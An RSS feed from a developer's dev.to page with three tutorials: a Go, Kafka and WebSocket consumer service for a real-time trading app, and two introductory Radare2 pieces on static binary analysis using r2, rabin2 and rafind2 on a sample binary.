<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Kamalesh-Seervi</title>
    <description>The latest articles on DEV Community by Kamalesh-Seervi (@kamaleshseervi).</description>
    <link>https://dev.to/kamaleshseervi</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1174145%2F5f04ad69-52be-404d-a2bb-3e782047740a.jpeg</url>
      <title>DEV Community: Kamalesh-Seervi</title>
      <link>https://dev.to/kamaleshseervi</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kamaleshseervi"/>
    <language>en</language>
    <item>
      <title>Real-Time Trading App: Golang, Kafka, Websockets — Setting up Consumer &amp; Websockets(PART-3)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Thu, 04 Jan 2024 13:40:48 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-consumer-websocketspart-3-177k</link>
      <guid>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-consumer-websocketspart-3-177k</guid>
      <description>&lt;h3&gt;
  
  
  &lt;strong&gt;Real-Time Trading App: Golang, Kafka, Websockets — Setting up Consumer &amp;amp; Websockets(PART-3)&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Step-by-step guide on configuring a Kafka consumer in Golang for real-time data processing.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--INRuGOui--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/660/0%2AE22oQGrg5j215OaI.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--INRuGOui--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/660/0%2AE22oQGrg5j215OaI.png" alt="golang" width="660" height="494"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;PART-3&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Creating Consumer Service &amp;amp; Websockets&lt;/strong&gt;
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;In this ongoing series, we’ve delved into the introductory aspects of our tech stack and explored the high-level architecture. Our journey began with the implementation of a producer service using Kafka and Golang. Having accomplished this initial phase, the focus now shifts to the creation of a consumer service. We will delve into the process of actively listening for Kafka events and seamlessly transmitting real-time ticker data to the frontend using websockets.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Why did we choose to employ websockets instead of directly integrating Kafka on the frontend?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In the initial post, it was highlighted that Kafka lacks substantial support for web browsers due to various reasons. Notably, Kafka primarily utilizes TCP, and browsers tend to keep TCP connections open for very brief durations. Additionally, Kafka’s distribution policy, where messages are spread across consumers, poses a challenge when each browser tab is treated as a separate consumer. This distribution not only affects tabs but also extends to other devices consuming the data.&lt;/li&gt;
&lt;li&gt;Moreover, Kafka consumers demand a significant amount of resources to manage offsets, message reads, and overall states. In contrast, websockets offer a lightweight alternative. This brief explanation serves as a justification for opting to use websockets to efficiently deliver real-time data to the frontend. Now, let’s delve into the implementation details of the consumer side.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Folder Structure:&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--nwpfzkxS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A4PzdaxQCzT7j3huRllL-2w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--nwpfzkxS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A4PzdaxQCzT7j3huRllL-2w.png" alt="" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;core/settings.go&lt;/strong&gt;
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package core

import (
 "fmt"
 "log"
 "os"
 "strings"

 "github.com/joho/godotenv"
)

var TICKERS []string
var KAFKA_HOST string
var KAFKA_PORT string

func Load() {

 err := godotenv.Load("../.env")
 if err != nil {
  log.Fatal("Failed to load environment file")
 }
 t := os.Getenv("TICKERS")
 TICKERS = strings.Split(t, ",") // assign to the package-level var (":=" would shadow it with a local)
 LoadTikers(TICKERS)

 KAFKA_HOST = "127.0.0.1"
 KAFKA_PORT = "9092"
 fmt.Println(TICKERS)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;core/ticker.go&lt;/strong&gt;
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package core

import "strings"

var tickerSet map[string]struct{}

func GetAllTickers() []string {
 tickerList := []string{}
 for key := range tickerSet {
  tickerList = append(tickerList, key)
 }
 return tickerList
}

func IsTickerAllowed(ticker string) bool {
 _, ok := tickerSet[strings.ToLower(ticker)]
 return ok
}

func LoadTikers(tickers []string) {
 if tickerSet == nil {
  tickerSet = make(map[string]struct{})
 }
 for _, t := range tickers {
  tickerSet[strings.ToLower(strings.Trim(strings.Trim(t, "\\"), "\""))] = struct{}{}
 }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;In our &lt;strong&gt;main.go&lt;/strong&gt; file, the &lt;strong&gt;settings.go&lt;/strong&gt; module serves the purpose of loading all environment variables, ensuring a streamlined configuration process. On the other hand, &lt;strong&gt;ticker.go&lt;/strong&gt; houses a comprehensive set of tickers and functions that will prove instrumental in upcoming stages of our implementation.&lt;/p&gt;

&lt;p&gt;Now, let’s integrate and configure these components within our  &lt;strong&gt;main.go&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  Initial code for main.go
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
 "github.com/kamalesh-seervi/consumer/core"
)

func main() {
 core.Load()
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Keeping it simple, we incorporate core.Load() in our main.go to ensure the environment file is loaded seamlessly. As a quick check, let's print the tickers using&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fmt.Println(core.GetAllTickers())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Now let’s build the API and WebSocket connection:
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;api/ticker.go&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package api

import (
 "context"
 "fmt"
 "log"
 "strings"

 "github.com/gin-gonic/gin"
 "github.com/gorilla/websocket"
 "github.com/segmentio/kafka-go"

 "github.com/kamalesh-seervi/consumer/core"
)

func GetAllTickers(c *gin.Context) {
 c.JSON(200, core.GetAllTickers())
}

func ListenTicker(c *gin.Context) {
 conn, err := websocket.Upgrade(c.Writer, c.Request, nil, 1024, 1024)
 if err != nil {
  log.Println("WebSocket Upgrade Error: ", err)
  return
 }
 defer conn.Close()

 currTicker := c.Param("ticker")
 log.Println("Current ticker: ", currTicker)

 if !core.IsTickerAllowed(currTicker) {
  conn.WriteMessage(websocket.CloseMessage, websocket.FormatCloseMessage(websocket.CloseUnsupportedData, "Ticker is not allowed"))
  log.Println("Ticker not allowed ticker: ", currTicker)
  return
 }

 topic := "trades-" + strings.ToLower(currTicker)
 reader := kafka.NewReader(kafka.ReaderConfig{
  Brokers: []string{core.KAFKA_HOST + ":" + core.KAFKA_PORT},
  Topic: topic,
 })
 reader.SetOffset(-1)
 defer reader.Close()

 conn.SetCloseHandler(func(code int, text string) error {
  reader.Close()
  log.Printf("Received connection close request. Closing connection .....")
  return nil
 })

 go func() {
  code, wsMessage, err := conn.NextReader()
  if err != nil {
   log.Println("Error reading last message from WS connection. Exiting ...")
   return
  }
  fmt.Printf("CODE : %d MESSAGE : %s\n", code, wsMessage)
 }()

 for {
  message, err := reader.ReadMessage(context.Background())
  if err != nil {
   log.Println("Error: ", err)
   return
  }
  fmt.Println("Reading..... ", string(message.Value))

  err = conn.WriteMessage(websocket.TextMessage, message.Value)
  if err != nil {
   log.Println("Error writing message to WS connection: ", err)
   return
  }
 }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Let’s break down the functionality of the ListenTicker function:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. WebSocket Upgrade:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The function begins by attempting to upgrade the HTTP connection to a WebSocket connection using websocket.Upgrade.&lt;/li&gt;
&lt;li&gt;If the upgrade fails, an error is logged, and the function returns.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Parameters and Ticker Validation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The current ticker is extracted from the request parameters.&lt;/li&gt;
&lt;li&gt;The function checks if the current ticker is allowed using the core.IsTickerAllowed function.&lt;/li&gt;
&lt;li&gt;If the ticker is not allowed, a message is sent to the WebSocket client indicating that the ticker is not allowed, and the function returns.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Kafka Topic Configuration:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Kafka topic is constructed based on the lowercase version of the current ticker.&lt;/li&gt;
&lt;li&gt;A Kafka reader is created using the kafka.NewReader function, configured with the Kafka broker information and topic.&lt;/li&gt;
&lt;li&gt;The reader’s offset is set to -1 (kafka.LastOffset), so consumption starts from the latest available message rather than replaying the topic from the beginning.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. WebSocket Connection Configuration:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A close handler is set on the WebSocket connection to handle closure events. It ensures that the Kafka reader is closed when the WebSocket connection is closed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Goroutine for Handling WebSocket Messages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A goroutine is launched to watch the WebSocket connection: it blocks until the next client message arrives (or a read error signals that the client disconnected), logs the details, and exits.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;6. Reading Kafka Messages and Broadcasting to WebSocket:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The function enters a loop where it continuously reads messages from the Kafka topic using reader.ReadMessage.&lt;/li&gt;
&lt;li&gt;Each Kafka message is then written to the WebSocket connection using conn.WriteMessage.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;7. Error Handling:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Errors during the WebSocket message reading or writing process are logged.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Now let’s link everything together and expose the WebSocket and API endpoints.&lt;/strong&gt;
&lt;/h4&gt;

&lt;h4&gt;
  
  
  api/routing.go
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package api

import (
 "github.com/gin-contrib/cors"
 "github.com/gin-gonic/gin"
)

func AddRoutes(router *gin.Engine) {
 router.Use(cors.Default())

 apiV1 := router.Group("/api/v1")
 {
  apiV1.GET("/tickers", GetAllTickers)
 }

 // WebSocket route
 router.GET("/ws/trades/:ticker", func(c *gin.Context) {
  if c.Request.Header.Get("Upgrade") != "websocket" {
   c.JSON(400, gin.H{"error": "WebSocket upgrade required"})
   return
  }

  // Specific WebSocket logic here
  ListenTicker(c)
 })
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;Final main.go&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
 "github.com/gin-contrib/cors"
 "github.com/gin-gonic/gin"
 "github.com/kamalesh-seervi/consumer/api"
 "github.com/kamalesh-seervi/consumer/core"
)

func main() {
 core.Load()
 router := gin.Default()

 // CORS middleware
 config := cors.DefaultConfig()
 config.AllowOrigins = []string{"*"}
 config.AllowMethods = []string{"GET", "POST", "HEAD", "PUT", "DELETE", "PATCH", "OPTIONS"}
 config.AllowHeaders = []string{"Origin", "Content-Type", "Accept", "Content-Length", "Accept-Language", "Accept-Encoding", "Connection", "Access-Control-Allow-Origin"}
 config.AllowCredentials = true
 router.Use(cors.New(config))

 // Add routes

 api.AddRoutes(router)

 // Start server
 router.Run(":8000")
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Open your web browser and navigate to the URL &lt;strong&gt;127.0.0.1:8000/api/v1/tickers&lt;/strong&gt;. You will receive a response similar to the following.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--9jWY0utR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Avy0s4MCPTRYo6wlMtgAOMg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--9jWY0utR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Avy0s4MCPTRYo6wlMtgAOMg.png" alt="" width="800" height="328"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Tickers&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Before proceeding, ensure that you have built the producer service and confirmed that it is actively running to facilitate data pushing to Kafka. If you are running the service with Docker, remember to update the  &lt;strong&gt;.env&lt;/strong&gt; file, replacing &lt;strong&gt;127.0.0.1&lt;/strong&gt; with &lt;strong&gt;kafka&lt;/strong&gt;. If you are running it locally, you can disregard this step.&lt;/p&gt;

&lt;p&gt;To swiftly execute this, use the provided command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo docker-compose up -d 
&amp;amp;
Run Both producer and consumer build files.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Now let’s test the WebSocket stream.
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--lPV2M3c4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AReSDwjhFWaJxx6_1HgVxZQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--lPV2M3c4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AReSDwjhFWaJxx6_1HgVxZQ.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Websocket stream&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vaQeOrCt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZ_kLV4v136ply6yC_rVNHA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vaQeOrCt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZ_kLV4v136ply6yC_rVNHA.png" alt="" width="800" height="419"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Consumer Live read data&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If you successfully receive the data, your backend is now seamlessly linked to Kafka.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With this, we are approaching the final stages. The data flows from the backend to the frontend, and in the upcoming article, we will delve into visualizing and interpreting the data using charts to better understand its dynamics.&lt;/p&gt;

&lt;h3&gt;
  
  
  Conclusion
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;In conclusion, this series of articles has guided us through the establishment of a robust tech stack and a well-designed high-level architecture. We initiated the implementation with the creation of a producer service, integrating Kafka and Golang for efficient data transmission. The decision to employ websockets on the frontend was motivated by the limitations of directly using Kafka in browsers, considering factors such as TCP connection handling and resource utilization.&lt;/p&gt;

&lt;p&gt;With the backend successfully linked to Kafka, we now have a functional system where data flows seamlessly from the producer service to the frontend through websockets. The backend is not only capable of fetching real-time data but also validating and broadcasting it to connected clients.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/Real-time-trade-app"&gt;GitHub - Kamalesh-Seervi/Real-time-trade-app: Kafka, WebSockets&lt;/a&gt;&lt;/p&gt;

</description>
      <category>trading</category>
      <category>softwaredevelopment</category>
      <category>go</category>
      <category>kafka</category>
    </item>
    <item>
      <title>Radare2 — Cross-References, Static Analysis, and Binary Information Retrieval (Part 2–3)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Sat, 23 Dec 2023 16:05:20 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/radare2-cross-references-static-analysis-and-binary-information-retrieval-part-2-3-41em</link>
      <guid>https://dev.to/kamaleshseervi/radare2-cross-references-static-analysis-and-binary-information-retrieval-part-2-3-41em</guid>
      <description>&lt;h3&gt;
  
  
  Radare2 — Cross-References, Static Analysis, and Binary Information Retrieval (Part 2–3)
&lt;/h3&gt;

&lt;p&gt;Navigating the Depths of Binary Analysis: Advanced Techniques and Insightful Information Extraction&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--JqwJw34i--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AODxpImjBe3mHKBWSuzZLEA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--JqwJw34i--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AODxpImjBe3mHKBWSuzZLEA.png" alt="radare2" width="800" height="579"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Static analysis &amp;amp; Binary Information&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Cross Reference Insights
&lt;/h3&gt;

&lt;p&gt;Discover the power of axt and axf commands for comprehensive cross-reference analysis. Uncover the relationships within the binary and understand its structure with these advanced tools.&lt;/p&gt;
&lt;h3&gt;
  
  
  Static Analysis Unveiled
&lt;/h3&gt;
&lt;h3&gt;
  
  
  Import and Export Libraries
&lt;/h3&gt;

&lt;p&gt;Use ii to reveal import libraries and iE for exports. Unravel the binary's dependencies and interactions by deciphering its import and export components.&lt;/p&gt;
&lt;h3&gt;
  
  
  Strings Analysis
&lt;/h3&gt;

&lt;p&gt;Unearth hidden insights with the iz command (or izz for the whole binary), revealing strings embedded within the binary. This crucial step unveils textual elements that provide valuable context and clues about the binary's functionality.&lt;/p&gt;
&lt;h3&gt;
  
  
  Getting In-Depth Binary Information
&lt;/h3&gt;
&lt;h3&gt;
  
  
  Rabin2: Your Binary Information Swiss Army Knife
&lt;/h3&gt;

&lt;p&gt;Leverage the power of rabin2 to obtain detailed information about the binary. From basic details to hexadecimal representations, rabin2 provides a wealth of insights.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;To get basic binary information:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -I ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--S4lvE7Q6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfnPx6WlfLuGbzC0f" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--S4lvE7Q6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfnPx6WlfLuGbzC0f" alt="" width="800" height="629"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hexadecimal view of the binary:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -H ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--SDwSwsYr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgTIX_tEbjkql3wzP1m8dzg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SDwSwsYr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgTIX_tEbjkql3wzP1m8dzg.png" alt="" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Extracting all strings with the -zz flag:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -zz ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hS4W6DEB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AcpNfG0hUSBTh5gW66MV-hA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hS4W6DEB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AcpNfG0hUSBTh5gW66MV-hA.png" alt="" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Rafind2: Advanced String Search
&lt;/h3&gt;

&lt;p&gt;Move beyond simple string searches with rafind2. This advanced tool allows for intricate string analysis within binary files, providing a more nuanced approach to information retrieval.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rafind2 -s frequencies ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--wFYW90sH--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab56vcewTsJV1Wqy2MhD5Dw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--wFYW90sH--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab56vcewTsJV1Wqy2MhD5Dw.png" alt="" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Loading Headers
&lt;/h3&gt;

&lt;p&gt;Learn to navigate binary headers with ease using commands like r2 -nn ./letter_frequencies, pf., and pf.elf_header @ elf_header. Understand the binary's structure and gain a deeper appreciation for its complexity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--923gTY6T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A5YGjmeCMSpZztzPVwSrqeQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--923gTY6T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A5YGjmeCMSpZztzPVwSrqeQ.png" alt="" width="800" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Conclusion:
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;In conclusion, our exploration of Radare2’s capabilities in binary analysis has unveiled a powerful set of tools for cross-referencing, static analysis, and binary information retrieval. Through commands like &lt;strong&gt;axt&lt;/strong&gt; , &lt;strong&gt;ii&lt;/strong&gt; , and &lt;strong&gt;iE&lt;/strong&gt; , we’ve navigated the intricacies of cross-references, dissected import and export libraries, and revealed critical strings within the binary.&lt;/p&gt;

&lt;p&gt;Leveraging &lt;strong&gt;rabin2&lt;/strong&gt; and &lt;strong&gt;rafind2&lt;/strong&gt; has provided us with comprehensive insights into the binary’s structure, offering detailed information and advanced string search capabilities. As we conclude this segment, the journey continues with an anticipation of further revelations in dynamic analysis and more advanced techniques in the upcoming parts of this series.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stay tuned for a deeper dive into the fascinating world of binary analysis with Radare2!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/radare2/tree/main"&gt;GitHub - Kamalesh-Seervi/radare2&lt;/a&gt;&lt;/p&gt;

</description>
      <category>reverseengineering</category>
      <category>binaryoptions</category>
      <category>cybersecurity</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Static Navigation Disassembly with Radare2 — PART-1</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Thu, 21 Dec 2023 15:59:11 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/static-navigation-disassembly-with-radare2-part-1-4end</link>
      <guid>https://dev.to/kamaleshseervi/static-navigation-disassembly-with-radare2-part-1-4end</guid>
      <description>&lt;h3&gt;
  
  
  Static Navigation Disassembly with Radare2 — PART-1
&lt;/h3&gt;

&lt;p&gt;To delve into the static analysis of binaries using Radare2, follow these fundamental commands:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--L0CGjWaY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AD2oiS0iMtUHr9oAVbyN2TA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--L0CGjWaY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AD2oiS0iMtUHr9oAVbyN2TA.png" alt="radare2" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Radare2 Beginner Guide
&lt;/h3&gt;

&lt;p&gt;I’ve outlined a 10-part plan to facilitate learning. Each part is accompanied by a dedicated folder containing a comprehensive README file for better understanding.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/radare2/tree/main"&gt;GitHub - Kamalesh-Seervi/radare2&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Radare2 consists of an hexadecimal editor (radare) with a wrapped IO layer supporting multiple backends for local/remote files, debugger (OS X, BSD, Linux, W32), stream analyzer, assembler/disassembler (rasm) for various architectures, code analysis modules, and scripting facilities. Additional tools include radiff (bindiffer), rax (base converter), rasc (shellcode development helper), rabin (binary information extractor), and rahash (block-based hash utility).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Installation:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install radare2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Running a Binary
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Check my GitHub link above to get the binary files.&lt;/li&gt;
&lt;li&gt;To execute a binary file in Radare2, use the following command:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After executing the command, radare2 drops you into its interactive prompt, positioned at the current seek address.&lt;/p&gt;

